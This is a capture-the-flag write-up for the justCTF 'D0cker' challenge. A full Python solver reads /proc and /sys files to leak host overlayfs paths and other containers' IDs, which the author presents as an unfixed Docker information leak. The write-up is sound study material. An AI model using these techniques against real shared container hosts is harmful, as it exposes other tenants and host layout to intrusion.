HackMD
  • New!
    New!  “Bookmark” and save your note
    Find a note that's worth keeping or want reading it later? “Bookmark” it to your personal reading list.
    Got it
      • Create new note
      • Create a note from template
    • New!  “Bookmark” and save your note
      New!  “Bookmark” and save your note
      Find a note that's worth keeping or want reading it later? “Bookmark” it to your personal reading list.
      Got it
      • Options
      • Versions and GitHub Sync
      • Transfer ownership
      • Delete this note
      • Template
      • Save as template
      • Insert from template
      • Export
      • Dropbox
      • Google Drive
      • Gist
      • Import
      • Dropbox
      • Google Drive
      • Gist
      • Clipboard
      • Download
      • Markdown
      • HTML
      • Raw HTML
      • ODF (Beta)
      • Sharing Link copied
      • /edit
      • View mode
        • Edit mode
        • View mode
        • Book mode
        • Slide mode
        Edit mode View mode Book mode Slide mode
      • Note Permission
      • Read
        • Owners
        • Signed-in users
        • Everyone
        Owners Signed-in users Everyone
      • Write
        • Owners
        • Signed-in users
        • Everyone
        Owners Signed-in users Everyone
      • More (Comment, Invitee)
      • Publishing
        Everyone on the web can find and read all notes of this public team.
        After the note is published, everyone on the web can find and read this note.
        See all published notes on profile page.
      • Commenting Enable
        Disabled Forbidden Owners Signed-in users Everyone
      • Permission
        • Forbidden
        • Owners
        • Signed-in users
        • Everyone
      • Invitee
      • No invitee
    Menu Sharing Create Help
    Create Create new note Create a note from template
    Menu
    Options
    Versions and GitHub Sync Transfer ownership Delete this note
    Export
    Dropbox Google Drive Gist
    Import
    Dropbox Google Drive Gist Clipboard
    Download
    Markdown HTML Raw HTML ODF (Beta)
    Back
    Sharing
    Sharing Link copied
    /edit
    View mode
    • Edit mode
    • View mode
    • Book mode
    • Slide mode
    Edit mode View mode Book mode Slide mode
    Note Permission
    Read
    Owners
    • Owners
    • Signed-in users
    • Everyone
    Owners Signed-in users Everyone
    Write
    Owners
    • Owners
    • Signed-in users
    • Everyone
    Owners Signed-in users Everyone
    More (Comment, Invitee)
    Publishing
    Everyone on the web can find and read all notes of this public team.
    After the note is published, everyone on the web can find and read this note.
    See all published notes on profile page.
    More (Comment, Invitee)
    Commenting Enable
    Disabled Forbidden Owners Signed-in users Everyone
    Permission
    Owners
    • Forbidden
    • Owners
    • Signed-in users
    • Everyone
    Invitee
    No invitee
       owned this note    owned this note      
    Published Linked with
    Like BookmarkBookmarked
    Subscribed
    • Any changes
      Be notified of any changes
    • Mention me
      Be notified of mention me
    • Unsubscribe
    Subscribe
    # D0cker In this challenge, we connect to a server which spawns us a Docker container. On the filesystem, there is an `oracle.sock` with which we have to communicate and we have to find answers to its questions. ``` ➜ pwn_docker git:(master) nc docker-ams32.nc.jctf.pro 1337 Access to this challenge is rate limited via hashcash! Please use the following command to solve the Proof of Work: hashcash -mb26 srstylyd Your PoW: 1:26:210131:srstylyd::j48cYbN3LycmgT9f:000000004U6N/ 1:26:210131:srstylyd::j48cYbN3LycmgT9f:000000004U6N/ [*] Spawning a task manager for you... [*] Spawning a Docker container with a shell for ya, with a timeout of 10m :) [*] Your task is to communicate with /oracle.sock and find out the answers for its questions! [*] You can use this command for that: [*] socat - UNIX-CONNECT:/oracle.sock [*] PS: If the socket dies for some reason (you cannot connect to it) just exit and get into another instance groups: cannot find name for group ID 1000 I have no name!@694ff9e7ac41:/$ ls -la / ls -la / total 56 drwxr-xr-x 1 root root 4096 Jan 31 18:37 . drwxr-xr-x 1 root root 4096 Jan 31 18:37 .. -rwxr-xr-x 1 root root 0 Jan 31 18:37 .dockerenv lrwxrwxrwx 1 root root 7 Jan 19 01:01 bin -> usr/bin drwxr-xr-x 2 root root 4096 Apr 15 2020 boot drwxr-xr-x 5 root root 360 Jan 31 18:37 dev drwxr-xr-x 1 root root 4096 Jan 31 18:37 etc drwxr-xr-x 2 root root 4096 Apr 15 2020 home lrwxrwxrwx 1 root root 7 Jan 19 01:01 lib -> usr/lib lrwxrwxrwx 1 root root 9 Jan 19 01:01 lib32 -> usr/lib32 lrwxrwxrwx 1 root root 9 Jan 19 01:01 lib64 -> usr/lib64 lrwxrwxrwx 1 root root 10 Jan 19 01:01 libx32 -> usr/libx32 drwxr-xr-x 2 root root 4096 Jan 19 01:01 media drwxr-xr-x 2 root root 4096 Jan 19 01:01 mnt drwxr-xr-x 2 root root 4096 Jan 19 01:01 opt srwxrwxrwx 1 root root 0 Jan 31 18:37 oracle.sock dr-xr-xr-x 153 root root 0 Jan 31 18:37 proc drwx------ 2 root root 4096 Jan 19 01:04 root drwxr-xr-x 1 root root 4096 Jan 21 03:38 run lrwxrwxrwx 1 root root 8 Jan 19 01:01 sbin -> usr/sbin drwxr-xr-x 2 root root 4096 Jan 19 01:01 srv dr-xr-xr-x 13 root root 0 Jan 31 18:37 sys drwxrwxrwt 1 root root 4096 Jan 30 20:11 tmp drwxr-xr-x 1 root root 4096 Jan 19 01:01 usr drwxr-xr-x 1 root root 4096 Jan 19 01:04 var I have no name!@694ff9e7ac41:/$ mount | grep sock mount | grep sock /dev/vda1 on /oracle.sock type ext4 (rw,relatime) ``` ## Level 1 We connect to the oracle as the challenge suggests, by using `socat - UNIX-CONNECT:/oracle.sock`. Alternatively a `python3` script can be used (which is helpful later on) as there is Python 3 interpreter in the container. ``` I have no name!@694ff9e7ac41:/$ socat - UNIX-CONNECT:/oracle.sock socat - UNIX-CONNECT:/oracle.sock Welcome to the ______ _____ _ | _ \ _ | | | | | | | |/' | ___| | _____ _ __ | | | | /| |/ __| |/ / _ \ '__| | |/ /\ |_/ / (__| < __/ | |___/ \___/ \___|_|\_\___|_| oracle! I will give you the flag if you can tell me certain information about the host (: ps: brute forcing is not the way to go. Let's go! [Level 1] What is the full *cpu model* model used? ``` In the first level the oracle asks us about the *cpu model used*. We can find this in the `/proc/cpuinfo` file: ``` I have no name!@8b6ad5efc924:/$ cat /proc/cpuinfo | grep -i model cat /proc/cpuinfo | grep -i model model : 85 model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz model : 85 model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz model : 85 model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz model : 85 model name : Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz ``` ## Second level In the second level, thhe oracle asks about *our full container id*: ``` [Level 1] What is the full *cpu model* model used? Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz Intel(R) Xeon(R) Gold 6140 CPU @ 2.30GHz That was easy :) [Level 2] What is your *container id*? ``` This can be found as part of the `/proc/self/cgroup` file: ``` I have no name!@8b6ad5efc924:/$ cat /proc/self/cgroup | head -n2 cat /proc/self/cgroup 12:cpuset:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259 11:hugetlb:/docker/8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259 ``` ## Third level Now, the oracle says it creates a `/secret` file inside of our container and wants us to read this value: ``` [Level 2] What is your *container id*? 8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259 8b6ad5efc924c8bd3a09f8b75d0b67c157542e1a0c85db3b5f1ff271e9039259 [Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret? ``` If we fail to answer, we can read this file: ``` [Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret? asd asd Meh, that is not the secret I wrote into your /secret path. Goodbye. I have no name!@8b6ad5efc924:/$ cat /secret cat /secret OBojABAvUcVCWcpOCgQwLtLxxmgUpQQFSQjjwDpTYVskjFvBAmLZjheaGPfWOGKOI have no name!@8b6ad5efc924:/$ ``` However, this file is re-created every time we get to level 3 and so we need to read it *at the same time as we talk to the oracle*. I guess there are multiple ways to do this, but the easiest is probably to write a Python script to do so (and save it in `/tmp` with `vim`, as it is also in the container). For this I have written the following code: ```py import sys import socket import time import subprocess with open('/proc/self/cgroup') as f: my_container_id = f.read().splitlines()[0].split('docker/')[1] print("MY CONTAINER ID: %s" % my_container_id) cpuinfo_lines = open('/proc/cpuinfo').read().splitlines() cpumodel_line = next(line for line in cpuinfo_lines if 'model name' in line) cpumodel = cpumodel_line.split(': ')[1].strip() sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.connect('/oracle.sock') print(sock.recv(864)) sock.sendall((cpumodel + '\n').encode()) print(sock.recv(len(b'That was easy :)\n[Level 2] What is your *container id*?\n'))) sock.sendall((my_container_id + '\n').encode()) print(sock.recv(500)) time.sleep(1) with open('/secret') as f: secret = f.read() print("READ SECRET: %s" % secret) sock.sendall((secret + '\n').encode()) print(sock.recv(500)) ``` If we launch it, we get to level 4: ``` I have no name!@d1d8c566419a:/$ cd /tmp cd /tmp I have no name!@d1d8c566419a:/tmp$ vim a.py vim a.py I have no name!@d1d8c566419a:/tmp$ python3 a.py python3 a.py MY CONTAINER ID: d1d8c566419a8c763c8515042d0d292907c4280e9d9c2c8e446fa92a4c444e0e b"Welcome to the\n ______ _____ _ \n | _ \\ _ | | | \n | | | | |/' | ___| | _____ _ __ \n | | | | /| |/ __| |/ / _ \\ '__|\n | |/ /\\ |_/ / (__| < __/ | \n |___/ \\___/ \\___|_|\\_\\___|_| \n oracle!\nI will give you the flag if you can tell me certain information about the host (:\nps: brute forcing is not the way to go.\nLet's go!\n[Level 1] What is the full *cpu model* model used?\n" b'That was easy :)\n[Level 2] What is your *container id*?\n' b'[Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret?\n' READ SECRET: nuKJfSaqzyyIrxfpkwFfzYAQWwmljCXBNztXBdffZiPacXRVVIIAxGIxAwnlPFRX b'[Level 4] Okay but... where did I actually write it? What is the path on the host that I wrote the /secret file to which then appeared in your container? (ps: there are multiple paths which you should be able to figure out but I only match one of them)\n' ``` ## Level 4 Now, we have to answer with a path the `/secret` file is visible on the host. Interestingly, because of how overlayfs works, which is the filesystem used by Docker in this challenge, the host path is present in the `/proc/mounts` file: ``` I have no name!@d1d8c566419a:/tmp$ cat /proc/mounts | head -n1 cat /proc/mounts | head -n1 overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/TNHN4TXZQR7PSITKI3EJKZ7SSE:/var/lib/docker/overlay2/l/JQG4DHIHDNUJUSNWI3BNOCS3GO:/var/lib/docker/overlay2/l/EPGEJI72R5AVERPF7MGK2ROUJ5:/var/lib/docker/overlay2/l/J3TTTPZ6J6HOAOEKZQQQII6SXE:/var/lib/docker/overlay2/l/BFOV7S6MFX4532OSVYTKYP37SP,upperdir=/var/lib/docker/overlay2/07bd747e7e08a4c28de6d20baa8236674f1a265d9640273447c23cd50f41150c/diff,workdir=/var/lib/docker/overlay2/07bd747e7e08a4c28de6d20baa8236674f1a265d9640273447c23cd50f41150c/work,xino=off 0 0 ``` The part that interests us is `upperdir` as this is the directory used for files in the overlayfs layer we change files in. So the `/secret` path is eventually `/var/lib/docker/overlay2/07bd747e7e08a4c28de6d20baa8236674f1a265d9640273447c23cd50f41150c/diff/secret`. We can extend our Python script with this: ``` with open('/proc/self/mounts') as f: mounts = f.read().splitlines() upperdir = [i for i in mounts if 'upperdir=' in i][0] upperdir = upperdir[upperdir.index('upperdir=')+len('upperdir='):] upperdir = upperdir.split(',')[0] path = upperdir+'/secret' print("PATH IS: %s" % path) sock.sendall((path + '\n').encode()) print(sock.recv(500)) ``` Then, we will get: ``` I have no name!@d1d8c566419a:/tmp$ python3 a.py python3 a.py MY CONTAINER ID: d1d8c566419a8c763c8515042d0d292907c4280e9d9c2c8e446fa92a4c444e0e b"Welcome to the\n ______ _____ _ \n | _ \\ _ | | | \n | | | | |/' | ___| | _____ _ __ \n | | | | /| |/ __| |/ / _ \\ '__|\n | |/ /\\ |_/ / (__| < __/ | \n |___/ \\___/ \\___|_|\\_\\___|_| \n oracle!\nI will give you the flag if you can tell me certain information about the host (:\nps: brute forcing is not the way to go.\nLet's go!\n[Level 1] What is the full *cpu model* model used?\n" b'That was easy :)\n[Level 2] What is your *container id*?\n' b'[Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret?\n' READ SECRET: SwKrVgQpsxiumerauAJeGlAGYfKOINwLRDkoPYvWnpnQGRlEYQdYprOpWMUwjsrM b'[Level 4] Okay but... where did I actually write it? What is the path on the host that I wrote the /secret file to which then appeared in your container? (ps: there are multiple paths which you should be able to figure out but I only match one of them)\n' PATH IS: /var/lib/docker/overlay2/07bd747e7e08a4c28de6d20baa8236674f1a265d9640273447c23cd50f41150c/diff/secret b'[Level 5] Good! Now, can you give me an id of any *other* running container?\n' ``` ## Level 5 In level 5 we have to find out an id of another container. This can be given e.g. by running another container, but, the reality is that other container ids can be found in `/sys` (or sysfs) paths, due to cgroups debug configuration present in this kernel. Actually, I believe this is a bug and I reported it to Docker, but they did not fix it (yet?). More information can be found in this presentation: https://docs.google.com/presentation/d/1VpXqzPIPrfIPSIiua5ClNkjKAzM3uKlyAKUf0jBqoUI/ ## Level 6 In level 6, we are asked about the oracle container id. For this, one can find ALL container ids using the previous technique and then try each of them. A full solver script and its output can be seen below: ``` import sys import socket import time import subprocess import re CONTAINER_ID_REGEX = '[a-z0-9]{64}' with open('/proc/self/cgroup') as f: my_container_id = f.read().splitlines()[0].split('docker/')[1] print("MY CONTAINER ID: %s" % my_container_id) cpuinfo_lines = open('/proc/cpuinfo').read().splitlines() cpumodel_line = next(line for line in cpuinfo_lines if 'model name' in line) cpumodel = cpumodel_line.split(': ')[1].strip() def get_container_ids(): data = subprocess.check_output('ls -l /sys/kernel/slab/*/cgroup/', shell=True).decode().splitlines() cgroups = set(line.split('(')[-1][:-1].split(':')[1] for line in data if '(' in line and line[-1] == ')') return cgroups def filter_container_ids(iterable): return [ i for i in iterable if re.match(CONTAINER_ID_REGEX, i) ] all_container_ids = filter_container_ids(get_container_ids()) def attempt(target_id): sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) sock.connect('/oracle.sock') print(sock.recv(864)) sock.sendall((cpumodel + '\n').encode()) print(sock.recv(len(b'That was easy :)\n[Level 2] What is your *container id*?\n'))) sock.sendall((my_container_id + '\n').encode()) print(sock.recv(500)) time.sleep(1) with open('/secret') as f: secret = f.read() print("READ SECRET: %s" % secret) sock.sendall((secret + '\n').encode()) print(sock.recv(500)) with open('/proc/self/mounts') as f: mounts = f.read().splitlines() upperdir = [i for i in mounts if 'upperdir=' in i][0] upperdir = upperdir[upperdir.index('upperdir=')+len('upperdir='):] upperdir = upperdir.split(',')[0] path = upperdir+'/secret' print("PATH IS: %s" % path) sock.sendall((path + '\n').encode()) print(sock.recv(500)) sock.sendall((target_id + '\n').encode()) print(sock.recv(500)) sock.sendall((target_id + '\n').encode()) flag = sock.recv(500) if b'justCTF' in flag: print(flag) sys.exit(0) for container_id in all_container_ids: attempt(container_id) ``` Output: ``` ➜ pwn_docker git:(master) nc docker-ams3.nc.jctf.pro 1337 Access to this challenge is rate limited via hashcash! Please use the following command to solve the Proof of Work: hashcash -mb26 qwfnelht Your PoW: 1:26:210131:qwfnelht::h+td0j0UshHduXoB:000000002Mwjf 1:26:210131:qwfnelht::h+td0j0UshHduXoB:000000002Mwjf [*] Spawning a task manager for you... [*] Spawning a Docker container with a shell for ya, with a timeout of 10m :) [*] Your task is to communicate with /oracle.sock and find out the answers for its questions! [*] You can use this command for that: [*] socat - UNIX-CONNECT:/oracle.sock [*] PS: If the socket dies for some reason (you cannot connect to it) just exit and get into another instance groups: cannot find name for group ID 1000 I have no name!@4d461268ca63:/$ cd /tmp cd /tmp I have no name!@4d461268ca63:/tmp$ vim a.py vim a.py I have no name!@4d461268ca63:/tmp$ python3 a.py python3 a.py MY CONTAINER ID: 4d461268ca6389cb9819370e5d16cd0fbd90c7cfbbc5a6e61f2c08c0cf05d36e b"Welcome to the\n ______ _____ _ \n | _ \\ _ | | | \n | | | | |/' | ___| | _____ _ __ \n | | | | /| |/ __| |/ / _ \\ '__|\n | |/ /\\ |_/ / (__| < __/ | \n |___/ \\___/ \\___|_|\\_\\___|_| \n oracle!\nI will give you the flag if you can tell me certain information about the host (:\nps: brute forcing is not the way to go.\nLet's go!\n[Level 1] What is the full *cpu model* model used?\n" b'That was easy :)\n[Level 2] What is your *container id*?\n' b'[Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret?\n' READ SECRET: VGWhBDKMnUAkibWVCIhLfBTEgHgCSnYFcXYlGrsJtloeVndueylkOOFTmaOWxpLZ b'[Level 4] Okay but... where did I actually write it? What is the path on the host that I wrote the /secret file to which then appeared in your container? (ps: there are multiple paths which you should be able to figure out but I only match one of them)\n' PATH IS: /var/lib/docker/overlay2/d21afca74baff438a964e910e351451fd3aa99448da2842def3f6dd9be415118/diff/secret b'[Level 5] Good! Now, can you give me an id of any *other* running container?\n' b"[Level 6] Now, let's go with the real and final challenge. I, the Docker Oracle, am also running in a container. What is my container id?\n" # (...) - truncated many many lines here b"Welcome to the\n ______ _____ _ \n | _ \\ _ | | | \n | | | | |/' | ___| | _____ _ __ \n | | | | /| |/ __| |/ / _ \\ '__|\n | |/ /\\ |_/ / (__| < __/ | \n |___/ \\___/ \\___|_|\\_\\___|_| \n oracle!\nI will give you the flag if you can tell me certain information about the host (:\nps: brute forcing is not the way to go.\nLet's go!\n[Level 1] What is the full *cpu model* model used?\n" b'That was easy :)\n[Level 2] What is your *container id*?\n' b'[Level 3] Let me check if you truly given me your container id. I created a /secret file on your machine. What is the hidden secret?\n' READ SECRET: xVYFjhtWEMLvAwqaJigvPdgUByAkLQKItUdURFGBXvtHbToyfPtrXKGOzHQycioP b'[Level 4] Okay but... where did I actually write it? What is the path on the host that I wrote the /secret file to which then appeared in your container? (ps: there are multiple paths which you should be able to figure out but I only match one of them)\n' PATH IS: /var/lib/docker/overlay2/d21afca74baff438a964e910e351451fd3aa99448da2842def3f6dd9be415118/diff/secret b'[Level 5] Good! Now, can you give me an id of any *other* running container?\n' b"[Level 6] Now, let's go with the real and final challenge. I, the Docker Oracle, am also running in a container. What is my container id?\n" b'[Levels cleared] Well done! Here is your flag!\njustCTF{maaybe-Docker-will-finally-fix-this-after-this-task?}\n\nGood job o/\n' ``` And the flag is `justCTF{maaybe-Docker-will-finally-fix-this-after-this-task?}`.

    Import from clipboard

    Advanced permission required

    Your current role can only read. Ask the system administrator to acquire write and comment permission.

    This team is disabled

    Sorry, this team is disabled. You can't edit this note.

    This note is locked

    Sorry, only owner can edit this note.

    Reach the limit

    Sorry, you've reached the max length this note can be.
    Please reduce the content or divide it to more notes, thank you!

    Import from Gist

    Import from Snippet

    or

    Export to Snippet

    Are you sure?

    Do you really want to delete this note?
    All users will lost their connection.

    Create a note from template

    Create a note from template

    Oops...
    This template is not available.
    All
    • All
    • Team
    No template found.

    Create a template

    Delete template

    Do you really want to delete this template?

    This page need refresh

    You have an incompatible client version.
    Refresh to update.
    New version available!
    See releases notes here
    Refresh to enjoy new features.
    Your user state has changed.
    Refresh to load new user state.

    Sign in

    Forgot password

    or

    By clicking below, you agree to our terms of service.

    Sign in via Facebook Sign in via Twitter Sign in via GitHub Sign in via Dropbox Sign in via Google

    New to HackMD? Sign up

    Help

    Documents

    Tutorials
    YAML Metadata
    Slide Example
    Book Example

    Contacts

    Talk to us
    Report an issue
    Send us email

    Cheatsheet

    Example Syntax
    Header # Header
    • Unordered List
    - Unordered List
    1. Ordered List
    1. Ordered List
    • Todo List
    - [ ] Todo List
    Blockquote
    > Blockquote
    Bold font **Bold font**
    Italics font *Italics font*
    Strikethrough ~~Strikethrough~~
    19th 19^th^
    H2O H~2~O
    Inserted text ++Inserted text++
    Marked text ==Marked text==
    Link [link text](https:// "title")
    Image ![image alt](https:// "title")
    Code `Code`
    var i = 0;
    ```javascript
    var i = 0;
    ```
    :smile: :smile:
    Externals {%youtube youtube_id %}
    LaTeX $L^aT_eX$

    This is a alert area.

    :::info
    This is a alert area.
    :::

    Versions

    Versions and GitHub Sync

    Sign in to link this note to GitHub Learn more
    This note is not linked with GitHub Learn more
     
    Add badge Pull Push GitHub Link Settings

    Version named by    

    More Less
    • Edit
    • Delete

    Note content is identical to the latest version.
    Compare with
      Choose a version
      No search result
      Version not found

    Feedback

    Submission failed, please try again

    Thanks for your support.

    On a scale of 0-10, how likely is it that you would recommend HackMD to your friends, family or business associates?

    Please give us some advice and help us improve HackMD.

     

    Thanks for your feedback

    Remove version name

    Do you want to remove this version name and description?

    Transfer ownership

    Transfer to
      Warning: is a public team. If you transfer note to this team, everyone on the web can find and read this note.

        Link with GitHub

        Please authorize HackMD on GitHub

        Please sign in to GitHub and install the HackMD app on your GitHub repo. Learn more

         Sign in to GitHub

        HackMD links with GitHub through a GitHub App. You can choose which repo to install our App.

        Push the note to GitHub Push to GitHub Pull a file from GitHub

          Authorize again
         

        Choose which file to push to

        Select repo
        Refresh Authorize more repos
        Select branch
        Select file
        Select branch
        Choose version(s) to push
        • Save a new version and push
        • Choose from existing versions

        Pull from GitHub

         
        File from GitHub
        File from HackMD

        GitHub Link Settings

        File linked

        Linked by
        File path
        Last synced branch

        Danger Zone

        Unlink
        You will no longer receive notification when GitHub file changes after unlink.

        Syncing

        Push failed

        Push successfully